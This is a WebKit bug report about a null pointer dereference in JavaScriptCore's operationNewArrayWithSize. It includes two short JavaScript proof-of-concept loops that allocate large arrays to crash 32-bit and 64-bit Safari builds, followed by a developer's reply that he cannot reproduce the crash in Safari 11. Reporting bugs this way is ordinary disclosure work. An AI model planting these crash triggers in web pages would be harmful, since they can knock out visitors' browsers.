Bug 179364
| Summary: | null pointer dereference in JSC::DFG::operationNewArrayWithSize | ||
|---|---|---|---|
| Product: | WebKit | Reporter: | zhunkibatu |
| Component: | JavaScriptCore | Assignee: | Nobody <webkit-unassigned> |
| Status: | NEW | ||
| Severity: | Normal | CC: | fpizlo, vulbugs |
| Priority: | P2 | ||
| Version: | Safari 10 | ||
| Hardware: | PC | ||
| OS: | macOS 10.12.4 | ||
zhunkibatu
The following poc can lead to a crash in a 32-bit build of Webkit.
##########################################
var array = new Array(10000);
for (var i = 0; i < 20000; ++i) {
var newArray = new Array(10000);
array[i % array.length] = newArray;
}
##########################################
To trigger a crash in a 64-bit safari, the poc need to change to
##########################################
var array = new Array(100000);
for (var i = 0; i < 200000; ++i) {
var newArray = new Array(100000);
array[i % array.length] = newArray;
}
##########################################
| Attachments | ||
|---|---|---|
| Add attachment proposed patch, testcase, etc. |
Alexey Proskuryakov
I cannot reproduce this in Safari 11. I suspect that the page gets killed for using too much memory before this crash occurs, so not sure if the underlying problem is still present.